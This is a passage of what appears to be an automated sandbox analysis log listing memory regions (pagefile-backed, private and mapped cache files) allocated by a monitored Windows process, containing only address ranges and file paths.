monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1202 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1203 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1204 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1205 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1206 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1207 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1208 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1209 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1210 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1211 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1212 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1213 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1214 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1215 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1216 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1217 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1218 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1219 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1220 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1221 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1222 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1223 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1224 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1225 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1226 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1227 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1228 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1229 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1230 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1231 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1232 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1233 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1234 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1235 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1236 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1237 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1238 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1239 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1240 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1241 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1242 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1243 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1244 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1245 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1246 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1247 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1248 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1249 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1250 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1251 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1252 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1253 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1254 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1255 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1256 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1257 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1258 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1259 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1260 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1261 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1262 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1263 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1264 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1265 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1266 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1267 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1268 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1269 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1270 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1271 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1272 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1273 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1274 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1275 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1276 start_va = 0x580000 end_va = 0x59bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1277 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1278 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1279 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1280 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1281 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1282 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1283 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1284 start_va = 0xc370000 end_va = 0xc866fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c370000" filename = "" Region: id = 1285 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1286 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1287 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1288 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1289 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1290 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1291 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1292 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1293 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1294 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1295 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1296 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1297 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1298 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1299 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1300 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1301 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1302 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1303 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1304 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1305 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1306 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1307 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1308 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1309 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1310 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1311 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1312 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1313 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1314 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1315 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1316 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1317 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1318 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1319 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1320 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1321 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1322 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1323 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1324 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1325 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1326 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1327 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1328 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1329 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1330 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1331 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1332 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1333 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1334 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1335 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1336 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1337 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1338 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1339 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1340 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1341 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1342 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1343 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1344 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1345 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1346 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1347 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1348 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1349 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1350 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1351 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1352 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1353 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1354 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1355 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1356 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1357 start_va = 0x530000 end_va = 0x533fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1358 start_va = 0xb770000 end_va = 0xc16ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b770000" filename = "" Region: id = 1359 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1360 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1361 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1362 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1363 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1364 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1365 start_va = 0x580000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1366 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1367 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1368 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1369 start_va = 0x580000 end_va = 0x583fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1370 start_va = 0x590000 end_va = 0x5a7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000016.db") Region: id = 1371 start_va = 0x580000 end_va = 0x597fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000016.db") Region: id = 1372 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1373 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1374 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1375 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1376 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1377 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1378 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1379 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1380 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1381 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1382 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1383 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1384 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1385 start_va = 0x5a0000 end_va = 0x5aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1386 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1387 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1388 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" 